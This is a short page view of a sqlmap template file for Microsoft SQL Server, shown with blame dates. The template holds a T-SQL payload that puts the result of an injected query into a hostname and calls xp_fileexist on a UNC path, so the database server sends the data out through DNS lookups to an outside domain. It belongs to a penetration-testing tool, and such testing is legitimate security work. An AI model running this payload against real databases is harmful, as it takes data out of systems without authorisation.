sqlmap/procs/mssqlserver/dns_request.txt

4 lines
146 B
Plaintext
Raw Normal View History

2012-02-15 17:45:10 +04:00
DECLARE @host varchar(1024);
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
2012-03-27 23:07:17 +04:00
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');